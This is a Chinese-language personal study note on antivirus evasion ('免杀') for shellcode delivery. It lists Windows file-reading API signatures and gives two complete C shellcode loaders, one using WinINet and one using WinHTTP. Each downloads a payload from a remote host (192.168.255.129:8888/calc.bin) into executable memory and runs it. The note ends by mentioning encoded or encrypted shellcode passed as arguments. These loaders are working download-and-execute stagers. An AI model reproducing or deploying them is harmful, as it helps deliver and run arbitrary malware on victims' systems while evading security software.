免杀笔记

攻防渗透

很久之前接触过静态免杀,不过由于自己的懒的原因没有继续学习下去,故而又来填坑,就浅浅的记录下自己从头开始学习免杀的过程,看看还能坚持不。

shellcode免杀

payload传输

1.从文件读取shellcode

需要用到以下的api

CreateFile

1
2
3
4
5
6
7
8
9
HANDLE CreateFileA(
  [in]           LPCSTR                lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-createfilea

GetFileSize

1
2
3
4
DWORD GetFileSize(
  [in]            HANDLE  hFile,
  [out, optional] LPDWORD lpFileSizeHigh
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-getfilesize

ReadFile

1
2
3
4
5
6
7
BOOL ReadFile(
  [in]                HANDLE       hFile,
  [out]               LPVOID       lpBuffer,
  [in]                DWORD        nNumberOfBytesToRead,
  [out, optional]     LPDWORD      lpNumberOfBytesRead,
  [in, out, optional] LPOVERLAPPED lpOverlapped
);

参考: https://learn.microsoft.com/zh-cn/windows/win32/api/fileapi/nf-fileapi-readfile

2. 从http读取

直接贴代码
wini net

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#include <windows.h>

#pragma comment(lib,"wininet")

#include <wininet.h>

  
  

int main()

{

void* exec;

int payload_len = 4096;

  

char host[] = "192.168.255.129";

WORD port = 8888;

char path[] = "/calc.bin";

  

HINTERNET session;

HINTERNET conn;

HINTERNET reqfile;

DWORD nread;

  
  

exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  

//使用默认设置创建会话

session = InternetOpen("Mozilla", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

//连接到目标主机

conn = InternetConnect(session, host, port, "", "", INTERNET_SERVICE_HTTP, 0, 0);

//创建请求

reqfile = HttpOpenRequest(conn, "GET", path, NULL, NULL, NULL, 0, 0);

//发送请求并读取响应

HttpSendRequest(reqfile, NULL, 0, 0, 0);

InternetReadFile(reqfile, exec, payload_len, &nread);

  

((void(*)())exec)();

//关闭所有句柄

InternetCloseHandle(reqfile);

InternetCloseHandle(conn);

InternetCloseHandle(session); c
}

winhttp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#include <windows.h>

#include <stdint.h>

#include <winhttp.h>

#pragma comment(lib,"winhttp")

  

int main()

{

void* exec;

int payload_len = 4096;

  

wchar_t host[] = L"192.168.255.129";

WORD port = 8888;

wchar_t path[] = L"/calc.bin";

  

HINTERNET session;

HINTERNET conn;

HINTERNET reqfile;

DWORD nread;

  
  

exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  

//使用默认设置创建会话

session = WinHttpOpen(L"Mozilla/4.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);

//连接到目标主机

conn = WinHttpConnect(session, host, port, 0);

//创建请求

reqfile = WinHttpOpenRequest(conn, L"GET", path, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);

//发送请求并读取响应

WinHttpSendRequest(reqfile, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);

WinHttpReceiveResponse(reqfile, NULL);

WinHttpReadData(reqfile, exec, payload_len, &nread);

  

((void(*)())exec)();

  

//关闭所有句柄

WinHttpCloseHandle(reqfile);

WinHttpCloseHandle(conn);

WinHttpCloseHandle(session);

}

3.参数接收shellcode

就是将shellcode转换成一些16进制、base64编码、aes加密等当作参数传输进去在进行解密加载。

shellcode 加密